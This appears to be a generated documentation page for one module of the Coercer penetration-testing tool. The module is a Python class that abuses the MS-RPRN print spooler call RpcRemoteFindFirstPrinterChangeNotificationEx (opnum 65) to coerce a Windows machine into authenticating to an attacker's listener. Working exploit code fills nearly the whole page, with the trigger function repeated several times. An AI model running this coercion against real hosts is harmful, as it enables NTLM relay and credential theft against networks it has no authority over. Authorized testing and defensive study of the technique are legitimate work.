coercer.methods.MS_RPRN.RpcRemoteFindFirstPrinterChangeNotificationEx

 1#!/usr/bin/env python3
 2# -*- coding: utf-8 -*-
 3# File name          : RpcRemoteFindFirstPrinterChangeNotificationEx.py
 4# Author             : Podalirius (@podalirius_)
 5# Date created       : 15 Sep 2022
 6
 7from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
 8from coercer.network.DCERPCSessionError import DCERPCSessionError
 9from impacket.dcerpc.v5 import rprn
10from impacket.dcerpc.v5.dtypes import NULL
11
12
13class RpcRemoteFindFirstPrinterChangeNotificationEx(MSPROTOCOLRPCCALL):
14    """
15    Coercing a machine to authenticate using function RpcRemoteFindFirstPrinterChangeNotificationEx (opnum 65) of [MS-RPRN]: Print System Remote Protocol (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/eb66b221-1c1f-4249-b8bc-c5befec2314d)
16
17    Method found by:
18     -
19    """
20
21    exploit_paths = [
22        ("smb", '\\\\{{listener}}\x00')
23    ]
24
25    access = {
26        "ncan_np": [
27            {
28                "namedpipe": r"\PIPE\spoolss",
29                "uuid": "12345678-1234-abcd-ef00-0123456789ab",
30                "version": "1.0"
31            }
32        ],
33        "ncacn_ip_tcp": [
34            {
35                "uuid": "12345678-1234-ABCD-EF00-0123456789AB",
36                "version": "1.0"
37            }
38        ]
39    }
40
41    protocol = {
42        "longname": "[MS-RPRN]: Print System Remote Protocol",
43        "shortname": "MS-RPRN"
44    }
45
46    function = {
47        "name": "RpcRemoteFindFirstPrinterChangeNotificationEx",
48        "opnum": 65,
49        "vulnerable_arguments": ["pszLocalMachine"]
50    }
51
52    def trigger(self, dcerpc_session, target):
53        if dcerpc_session is not None:
54            try:
55                resp = rprn.hRpcOpenPrinter(dcerpc_session, '\\\\%s\x00' % target)
56                request = rprn.RpcRemoteFindFirstPrinterChangeNotificationEx()
57                request['hPrinter'] = resp['pHandle']
58                request['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB
59                request['pszLocalMachine'] = self.path
60                request['pOptions'] = NULL
61                resp = dcerpc_session.request(request)
62                return ""
63            except Exception as err:
64                return err
65        else:
66            print("[!] Error: dce is None, you must call connect() first.")
67            return None
class RpcRemoteFindFirstPrinterChangeNotificationEx(coercer.models.MSPROTOCOLRPCCALL.MSPROTOCOLRPCCALL):
14class RpcRemoteFindFirstPrinterChangeNotificationEx(MSPROTOCOLRPCCALL):
15    """
16    Coercing a machine to authenticate using function RpcRemoteFindFirstPrinterChangeNotificationEx (opnum 65) of [MS-RPRN]: Print System Remote Protocol (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/eb66b221-1c1f-4249-b8bc-c5befec2314d)
17
18    Method found by:
19     -
20    """
21
22    exploit_paths = [
23        ("smb", '\\\\{{listener}}\x00')
24    ]
25
26    access = {
27        "ncan_np": [
28            {
29                "namedpipe": r"\PIPE\spoolss",
30                "uuid": "12345678-1234-abcd-ef00-0123456789ab",
31                "version": "1.0"
32            }
33        ],
34        "ncacn_ip_tcp": [
35            {
36                "uuid": "12345678-1234-ABCD-EF00-0123456789AB",
37                "version": "1.0"
38            }
39        ]
40    }
41
42    protocol = {
43        "longname": "[MS-RPRN]: Print System Remote Protocol",
44        "shortname": "MS-RPRN"
45    }
46
47    function = {
48        "name": "RpcRemoteFindFirstPrinterChangeNotificationEx",
49        "opnum": 65,
50        "vulnerable_arguments": ["pszLocalMachine"]
51    }
52
53    def trigger(self, dcerpc_session, target):
54        if dcerpc_session is not None:
55            try:
56                resp = rprn.hRpcOpenPrinter(dcerpc_session, '\\\\%s\x00' % target)
57                request = rprn.RpcRemoteFindFirstPrinterChangeNotificationEx()
58                request['hPrinter'] = resp['pHandle']
59                request['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB
60                request['pszLocalMachine'] = self.path
61                request['pOptions'] = NULL
62                resp = dcerpc_session.request(request)
63                return ""
64            except Exception as err:
65                return err
66        else:
67            print("[!] Error: dce is None, you must call connect() first.")
68            return None

Coercing a machine to authenticate using function RpcRemoteFindFirstPrinterChangeNotificationEx (opnum 65) of [MS-RPRN]: Print System Remote Protocol (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/eb66b221-1c1f-4249-b8bc-c5befec2314d)

Method found by: -

exploit_paths = [('smb', '\\\\{{listener}}\x00')]
access = {'ncan_np': [{'namedpipe': '\\PIPE\\spoolss', 'uuid': '12345678-1234-abcd-ef00-0123456789ab', 'version': '1.0'}], 'ncacn_ip_tcp': [{'uuid': '12345678-1234-ABCD-EF00-0123456789AB', 'version': '1.0'}]}
protocol = {'longname': '[MS-RPRN]: Print System Remote Protocol', 'shortname': 'MS-RPRN'}
function = {'name': 'RpcRemoteFindFirstPrinterChangeNotificationEx', 'opnum': 65, 'vulnerable_arguments': ['pszLocalMachine']}
def trigger(self, dcerpc_session, target):
53    def trigger(self, dcerpc_session, target):
54        if dcerpc_session is not None:
55            try:
56                resp = rprn.hRpcOpenPrinter(dcerpc_session, '\\\\%s\x00' % target)
57                request = rprn.RpcRemoteFindFirstPrinterChangeNotificationEx()
58                request['hPrinter'] = resp['pHandle']
59                request['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB
60                request['pszLocalMachine'] = self.path
61                request['pOptions'] = NULL
62                resp = dcerpc_session.request(request)
63                return ""
64            except Exception as err:
65                return err
66        else:
67            print("[!] Error: dce is None, you must call connect() first.")
68            return None